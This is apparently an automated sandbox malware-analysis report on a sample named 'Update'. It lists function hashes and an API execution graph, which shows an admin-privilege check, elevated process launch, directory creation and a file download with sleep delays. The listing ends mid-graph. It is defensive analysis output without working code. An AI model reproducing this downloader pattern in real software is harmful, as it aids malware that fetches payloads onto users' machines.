                                                                    • Instruction ID: 9b42ddaadeb69862bc9421371db2d13cec603068895ddf2cdca714165548cc69
                                                                    • Opcode Fuzzy Hash: 4f2c31741a96c1a031bbda2f9b95c55ec57c37cab84217cc0c0fde5ecec3895f
                                                                    • Instruction Fuzzy Hash: 00F0FE34518A4D8FDB84EF28C44076533A1FF58318F900569E81DC7192CB35E9A6CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2A951 Relevance: .0, Instructions: 28COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cb7ea73b7e33ffc05506516f92d1310c9036f4d6211b72f416141841dbabbe7
                                                                    • Instruction ID: 87d00198a420e6fc0392a8bba81ef9322875a93fd085bb1e3f5a38a41ea9062f
                                                                    • Opcode Fuzzy Hash: 8cb7ea73b7e33ffc05506516f92d1310c9036f4d6211b72f416141841dbabbe7
                                                                    • Instruction Fuzzy Hash: 6AE0DF71C4DA4DCFDB48FB69A8422E57BA0FB09348F0101A9D10CC31C1D72659D0C785
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2BA20 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                                                    • Instruction ID: 7b98cb7ae2748eae44a583b39ee3d704249fdcbc5f8ece6c11fbef22e2e38cfd
                                                                    • Opcode Fuzzy Hash: 09764730f88ca0710a5f56b8b043771dc088181434ddbae5fea520ff63f8bc6a
                                                                    • Instruction Fuzzy Hash: B0E0BF71914A0C9F8B48EF58E8498DA7BF4FB69315B01025BF41DD3160DB719A54CBC5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F3D4C0 Relevance: .0, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 82a4a7baa494b2800adebc013fc33f9a30edfb913a5bfdd8d5d5b2f61952b132
                                                                    • Instruction ID: 115f6db7f01cd68a549f0af2a358d63b121f497c04e1e007229316740c871070
                                                                    • Opcode Fuzzy Hash: 82a4a7baa494b2800adebc013fc33f9a30edfb913a5bfdd8d5d5b2f61952b132
                                                                    • Instruction Fuzzy Hash: 9CE0EC30A1CD194FEA98B76CA055AB872D0EF59280B5100B7E80DD72E6DE496C824389
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F24B10 Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3fbd5c338b8a56d1caa0c7af80a4cbf491c7c4b87a6df492b78794acbd4e39b8
                                                                    • Instruction ID: db5114a73d2f052b84bdeaafdad6af1a95f3080806cd968d0a821718e0a09ec1
                                                                    • Opcode Fuzzy Hash: 3fbd5c338b8a56d1caa0c7af80a4cbf491c7c4b87a6df492b78794acbd4e39b8
                                                                    • Instruction Fuzzy Hash: 51D01721F6D92A5BF7A8B7AC38521F93281EB486A4F4441F1E10DC61CAFD0D2C9103D8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2E99D Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0f3fd89551564880d5684b0073bbcb8b5dcf7527d462838dd30a04e0daa0f86e
                                                                    • Instruction ID: 1543131f3a0bf040e3d7b549c316442ddab2778f4b22994d9841341ae4af1e18
                                                                    • Opcode Fuzzy Hash: 0f3fd89551564880d5684b0073bbcb8b5dcf7527d462838dd30a04e0daa0f86e
                                                                    • Instruction Fuzzy Hash: B7D01721F8A81E1DEB84F3B878165FDB2AAEF88245F901476E51DC2187CE2D29114286
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F366CD Relevance: .0, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b60d28f192ef1b6cd11d15220904fbaedb33360107e9655cf9ac237c6095ab8
                                                                    • Instruction ID: ff36db5e88941a1dbc99e05feb34b3f1bd153143b84b25c9cbe833d99eeeee1c
                                                                    • Opcode Fuzzy Hash: 0b60d28f192ef1b6cd11d15220904fbaedb33360107e9655cf9ac237c6095ab8
                                                                    • Instruction Fuzzy Hash: 85D05E21F4981D0DEB44B37868165FEB29AEFC8285FC00476E51EC21C7DE2D69110296
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F25149 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 64a29916fde6138ba191c3fd9211f52a845e3bdd5a0b8e3a6dae016a167d24b5
                                                                    • Instruction ID: f645b85d71d8f3b4619db31688781f8a9a6645d89122616df80fd3be7f27b45d
                                                                    • Opcode Fuzzy Hash: 64a29916fde6138ba191c3fd9211f52a845e3bdd5a0b8e3a6dae016a167d24b5
                                                                    • Instruction Fuzzy Hash: 61E01222D1E98B4EE645773C19561755580AF592C0F6904B5D808CB0D7FF4E98484259
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F3AE5F Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6597e720f16c6affc9f05990d22f342547c9b793b223129c1835df606ce7ccd8
                                                                    • Instruction ID: 4f220947a61ecc41f9d56144aea0921a684064bd35650d8850e5d36134c3e3af
                                                                    • Opcode Fuzzy Hash: 6597e720f16c6affc9f05990d22f342547c9b793b223129c1835df606ce7ccd8
                                                                    • Instruction Fuzzy Hash: 37D0221231CE9C0EE364A21C78422F4B7C0CB51230F0001ABE84AC2283C84B68C202C5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F35EA5 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f5ed320ae4d16b59e02bc361a80c66c5bd437a85366bb7553a94754e1dd159ac
                                                                    • Instruction ID: 4fdf5acf26fd608bf1caad7b24031ee76e34ca9a975dc5d3a6558ae1f96ca947
                                                                    • Opcode Fuzzy Hash: f5ed320ae4d16b59e02bc361a80c66c5bd437a85366bb7553a94754e1dd159ac
                                                                    • Instruction Fuzzy Hash: 90C04C3394D1154CB7187248B8030FCB350EB82175F50113BD24B414826A0B3437148A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F281C0 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a53dd35bfa984e5c957bfc0d557c8ff308ff4eefe7f7aa662776a5a14184b182
                                                                    • Instruction ID: 64687c63bafb79082a4011d2a014ed2c12713ef4186909ccd735fabda0161395
                                                                    • Opcode Fuzzy Hash: a53dd35bfa984e5c957bfc0d557c8ff308ff4eefe7f7aa662776a5a14184b182
                                                                    • Instruction Fuzzy Hash: 0FC0123246CA494BC701B758F4514EEF350FF90750F400B3AE04A810A5EED9664886C1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2FBF9 Relevance: .0, Instructions: 13COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ed93a1426e417b063078d583427c3367199f6ba42155c49065dd649967281b29
                                                                    • Instruction ID: f3826ada241526dad5cf773fdccefc232a8911827f6fe3ced19e3a4120142264
                                                                    • Opcode Fuzzy Hash: ed93a1426e417b063078d583427c3367199f6ba42155c49065dd649967281b29
                                                                    • Instruction Fuzzy Hash: F9C012715146444BD704AA0484464E637D1FB94241F800A6AEC89DA261DA2996454691
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F382F4 Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a37af077b55ee4ef49a042926f0f855370601f51217b677a17824fe2fb9f88df
                                                                    • Instruction ID: 25d96455df3255b287fc3a2d2ffff30bfe1adfc9a51950c4dcd88529d83a36c8
                                                                    • Opcode Fuzzy Hash: a37af077b55ee4ef49a042926f0f855370601f51217b677a17824fe2fb9f88df
                                                                    • Instruction Fuzzy Hash: ACB0123398D11C4CAF10518478020FCF350E749174F501133D10E61040670B60311184
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F33A86 Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2d0ca1adcdc0f6e52e46f1d555b5d7a6bcd1754f596c3ccef332f87b735a6998
                                                                    • Instruction ID: c1cf99450a75b3a4cbc5f2e42b3f882467708fbda21cbfe82f99e71c6767fa05
                                                                    • Opcode Fuzzy Hash: 2d0ca1adcdc0f6e52e46f1d555b5d7a6bcd1754f596c3ccef332f87b735a6998
                                                                    • Instruction Fuzzy Hash: 4BA0120AE5A01500B100605878410E4E301CBC0071A554F32D8044004D989E01821040
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2D9DC Relevance: .0, Instructions: 9COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                                                    • Instruction ID: 10db4b1d6b4a6a211a237af434cbdc287686e8df6ddfe51e262268a5e286a013
                                                                    • Opcode Fuzzy Hash: e6ec1eebebe6caaada64bafab98ba878d12c4b88b7e6642d0097e2506851b3b1
                                                                    • Instruction Fuzzy Hash: 5EB0923595844D9ADF00B7B434020E83240EF44294F800672E80DC34C2EE2A65240548
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F2C227 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afc30b50fd6613669bb65fb465212ce94fc880d4751dd0c362cb15a7bc603f02
                                                                    • Instruction ID: 6d2d79b0f717f8ccf4d212d9036a07a2616510574854b03e2d73f2bbe4f09902
                                                                    • Opcode Fuzzy Hash: afc30b50fd6613669bb65fb465212ce94fc880d4751dd0c362cb15a7bc603f02
                                                                    • Instruction Fuzzy Hash: C1A01237A44019448B109288B4010FDB310D798161F110033D21DC1040A61210284180
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00007FF848F4773E Relevance: 10.3, Strings: 8, Instructions: 333COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8cI$8cI$8cI$8cI$8cI$XhI$fI$fI
                                                                    • API String ID: 0-2751153591
                                                                    • Opcode ID: a9ca9675b28601f10fa60706b9b70a1405ac110c465406418e5381d10f88326d
                                                                    • Instruction ID: 548cf0095a2c20bcde54ee35c6adf61922b2ab5d3f46b654ae74c016595d0e9d
                                                                    • Opcode Fuzzy Hash: a9ca9675b28601f10fa60706b9b70a1405ac110c465406418e5381d10f88326d
                                                                    • Instruction Fuzzy Hash: 6D91A132A1DD8F5FEAA8A72C545567537D1EFB4A90F6441BBC049D32D6EF28E8028384
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F221C9 Relevance: 10.2, Strings: 8, Instructions: 165COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4024470385
                                                                    • Opcode ID: 751b0172a96b97e3c2b49c3e030b69ed27eb3496a81506a155174e0f3a850f40
                                                                    • Instruction ID: a71472cbf1032f3afae613a106d641661d40d5c15da1daac3d0180f3feebff2e
                                                                    • Opcode Fuzzy Hash: 751b0172a96b97e3c2b49c3e030b69ed27eb3496a81506a155174e0f3a850f40
                                                                    • Instruction Fuzzy Hash: 1B41D673F1D94B4FF2A8A6AC68562B993C2FBA8BD0B4504B9C40DD72C6DE2D5C034355
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F46D65 Relevance: 9.0, Strings: 7, Instructions: 265COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 5R_H$HAH$HAH$HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-1281346573
                                                                    • Opcode ID: b5ebfa252040c993aa8fcbd428fac6b5a1de7712d4273ed26575ceeb7ce41f14
                                                                    • Instruction ID: eaebc5c01c43149a0872240ec7cb5538059319ef4afe7d7cd26b92290cf52d57
                                                                    • Opcode Fuzzy Hash: b5ebfa252040c993aa8fcbd428fac6b5a1de7712d4273ed26575ceeb7ce41f14
                                                                    • Instruction Fuzzy Hash: 3971B261F1DD4A5FF698EB2C945527967D2FBA8B90F0441BAC04EC32C6EE2C9C434744
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F204F2 Relevance: 7.8, Strings: 6, Instructions: 298COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ?N_^$N_^N$N_^P$N_^f$N_^t$N_^v
                                                                    • API String ID: 0-355402398
                                                                    • Opcode ID: 1868d7061b0039a792d283cacd5469782795591155bb1dd3954770ba4b81c08a
                                                                    • Instruction ID: 699408c70378e658aca0b9c0fafafb4769bf6982d7da56e8e336f3d0ac11cab9
                                                                    • Opcode Fuzzy Hash: 1868d7061b0039a792d283cacd5469782795591155bb1dd3954770ba4b81c08a
                                                                    • Instruction Fuzzy Hash: DE81B613A1F162AAE25177BC74551EA6B60EF813FDF1846B7D1CC8D0839E0D208686ED
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F22A50 Relevance: 7.8, Strings: 6, Instructions: 253COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH$HAH$wT_H
                                                                    • API String ID: 0-3713811036
                                                                    • Opcode ID: 0ddc7ef5f1b0b25ee5151094e15599fafe9470aaca9bb419df7e8cdf420be7b0
                                                                    • Instruction ID: 9bb4142b196fcde8fe5e91313da18e2ca38f77f111eb9ba7eb70bc4469c1a6b8
                                                                    • Opcode Fuzzy Hash: 0ddc7ef5f1b0b25ee5151094e15599fafe9470aaca9bb419df7e8cdf420be7b0
                                                                    • Instruction Fuzzy Hash: 2E614632F1D94A0FE268A77C68552B9A7D1FB956A0F0406BAC04EC32C6DE3D68038385
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F42460 Relevance: 5.3, Strings: 4, Instructions: 268COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: HAH$HAH$HAH$HAH
                                                                    • API String ID: 0-4204409433
                                                                    • Opcode ID: 8ba29a8939652822e06d6240150e9da4569ca2287c2de996db1642e7f79d2e24
                                                                    • Instruction ID: f3eb6cd0edbe40ad0b90e42131cc0c2cd800ddbdf75a6e0820f8c993f9ce1e2e
                                                                    • Opcode Fuzzy Hash: 8ba29a8939652822e06d6240150e9da4569ca2287c2de996db1642e7f79d2e24
                                                                    • Instruction Fuzzy Hash: BD714732E0D98E4FE359EB6C98652B93BE2EFA5750F0402BBC009D71D7DE285C068395
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FF848F477E2 Relevance: 5.2, Strings: 4, Instructions: 150COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2054248924.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff848f20000_Update.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 8cI$8cI$8cI$8cI
                                                                    • API String ID: 0-3310046442
                                                                    • Opcode ID: 91098d7017dd03f02aa21eb450a7b239af3806f12af080dc844d0577028c31d0
                                                                    • Instruction ID: 29d50639ca9766daafaf50fdfe08dfeb3c2416810d75c68f034902d25786b81d
                                                                    • Opcode Fuzzy Hash: 91098d7017dd03f02aa21eb450a7b239af3806f12af080dc844d0577028c31d0
                                                                    • Instruction Fuzzy Hash: A4416332F1DD4F5FE6A8A71C645157563D1EBB4B90F6446B7D009D32C6EF28E8028288
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:4.6%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:3.7%
                                                                    Total number of Nodes:1279
                                                                    Total number of Limit Nodes:19
                                                                    execution_graph 10961 645850 10964 4107f8 10961->10964 10963 645860 10965 410803 10964->10965 10968 409778 10965->10968 10969 409787 10968->10969 10970 40978c GetCurrentThreadId 10968->10970 10969->10970 10971 4097c2 10970->10971 10972 409ac4 10971->10972 10973 409835 10971->10973 10975 409ae0 10972->10975 10976 409af1 10972->10976 10987 40970c 10973->10987 10991 409a2c 10975->10991 10978 409afa GetCurrentThreadId 10976->10978 10982 409b07 10976->10982 10978->10982 10980 409aea 10980->10976 10981 406f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 10981->10982 10982->10981 10983 409b97 FreeLibrary 10982->10983 10984 409bbf 10982->10984 10983->10982 10985 409bc8 10984->10985 10986 409bce ExitProcess 10984->10986 10985->10986 10988 409754 10987->10988 10989 40971c 10987->10989 10988->10963 10989->10988 10997 40f134 GetSystemInfo 10989->10997 10993 409a36 GetStdHandle WriteFile 10991->10993 10995 409a93 10991->10995 10998 40a5a8 10993->10998 10995->10980 10996 409a83 GetStdHandle WriteFile 10996->10980 10997->10989 10999 40a5ae 10998->10999 10999->10996 11000 410c34 11001 410cdb 11000->11001 11003 410c5a 11000->11003 11003->11001 11004 410844 11003->11004 11005 41086f 11004->11005 11006 4108e0 RaiseException 11005->11006 11007 410908 11005->11007 11023 410975 11006->11023 11008 4109a8 11007->11008 11009 41099d LoadLibraryA 11007->11009 11013 410a3e 11007->11013 11007->11023 11011 4109f7 11008->11011 11012 4109ac GetLastError 11008->11012 11009->11008 11010 410aa7 11015 410aab GetLastError 11010->11015 11010->11023 11020 410a05 11011->11020 11021 410a38 FreeLibrary 11011->11021 11016 4109bd 11012->11016 11013->11010 11014 410a9b GetProcAddress 11013->11014 11013->11023 11014->11010 11017 410abc 11015->11017 11016->11011 11019 4109cf RaiseException 11016->11019 11018 410ace RaiseException 11017->11018 11017->11023 11018->11023 11019->11023 11020->11013 11022 410a0b LocalAlloc 11020->11022 11021->11013 11022->11013 11024 410a1b 11022->11024 11023->11003 11024->11013 11025 633404 IsUserAnAdmin 11026 633485 11025->11026 11027 63342d 11025->11027 11042 633718 11026->11042 11030 63349d GetMessageW 11027->11030 11031 63343f 11027->11031 11029 63348f 11029->11030 11032 633491 TranslateMessage DispatchMessageW 11030->11032 11036 6334ad 11030->11036 11057 424f1c 11031->11057 11032->11030 11037 633459 11071 63534c 11037->11071 11039 633471 11075 633a38 11039->11075 11041 633483 11041->11030 11043 633759 11042->11043 11084 5eeaf0 11043->11084 11045 633782 11046 5eeaf0 2 API calls 11045->11046 11047 6337a4 11046->11047 11048 6337b7 ShellExecuteExW 11047->11048 11049 6337cb WaitForSingleObject 11048->11049 11050 63381c 11048->11050 11051 6337e4 MsgWaitForMultipleObjects 11049->11051 11052 633718 130 API calls 11050->11052 11053 6337d8 11051->11053 11054 6337fd GetExitCodeProcess CloseHandle 11051->11054 11056 633826 11052->11056 11087 5edfb8 11053->11087 11054->11056 11056->11029 11345 40a8a4 11057->11345 11059 424f2f GetFileAttributesW 11060 424f42 11059->11060 11061 424fc3 GetLastError 11059->11061 11062 424f5e CreateFileW 11060->11062 11063 424f8c 11060->11063 11067 424f4a 11060->11067 11061->11067 11065 424f7b CloseHandle 11062->11065 11062->11067 11064 424f98 CreateFileW 11063->11064 11063->11067 11066 424fb5 CloseHandle 11064->11066 11064->11067 11065->11067 11066->11067 11067->11030 11068 4258ec 11067->11068 11069 40a8a4 11068->11069 11070 4258f8 CreateDirectoryW 11069->11070 11070->11037 11072 635360 11071->11072 11347 635b3c 11072->11347 11074 635399 11074->11039 11076 633a4c 11075->11076 11077 633a5c Sleep 11076->11077 11078 633a80 11077->11078 11079 633a89 URLDownloadToFileW 11078->11079 11080 633aa5 11079->11080 11417 639740 11080->11417 11082 633ac1 Sleep 11083 633ae5 11082->11083 11083->11041 11091 4071f0 11084->11091 11086 5eeafc 11086->11045 11088 5edfbe 11087->11088 11090 5edfcb 11088->11090 11097 5edea4 PeekMessageW 11088->11097 11090->11051 11092 407204 11091->11092 11093 407226 GetCommandLineW 11092->11093 11094 407208 GetModuleFileNameW 11092->11094 11096 40722d 11093->11096 11095 407224 11094->11095 11095->11096 11096->11086 11098 5edfa6 11097->11098 11099 5edec5 11097->11099 11098->11088 11100 5edecb IsWindowUnicode 11099->11100 11101 5eded5 11099->11101 11100->11101 11102 5edefc PeekMessageA 11101->11102 11103 5edee6 PeekMessageW 11101->11103 11104 5edf10 11102->11104 11103->11104 11104->11098 11118 5efd40 GetCapture 11104->11118 11106 5edf4b 11106->11098 11125 5edd38 11106->11125 11115 5edf89 TranslateMessage 11116 5edf9e DispatchMessageA 11115->11116 11117 5edf96 DispatchMessageW 11115->11117 11116->11098 11117->11098 11119 5efd55 11118->11119 11123 5efd66 11118->11123 11119->11123 11153 532154 11119->11153 11121 5efd71 11122 5efd77 GetParent 11121->11122 11121->11123 11124 532154 7 API calls 11121->11124 11122->11121 11122->11123 11123->11106 11124->11121 11126 5edd4c 11125->11126 11127 5edd63 11125->11127 11126->11127 11166 5ef320 11126->11166 11127->11098 11129 5edbf0 11127->11129 11130 5edc3a 11129->11130 11131 5edc00 11129->11131 11130->11098 11133 5edc40 11130->11133 11131->11130 11132 5edc27 TranslateMDISysAccel 11131->11132 11132->11130 11134 5edd2e 11133->11134 11135 5edc5b 11133->11135 11134->11098 11148 5edba8 11134->11148 11135->11134 11136 5edc66 GetCapture 11135->11136 11137 5edcf0 GetWindowThreadProcessId GetWindowThreadProcessId 11136->11137 11141 5edc71 11136->11141 11137->11134 11138 5edd11 SendMessageW 11137->11138 11138->11134 11140 5edccd 11138->11140 11140->11134 11142 5edca2 11141->11142 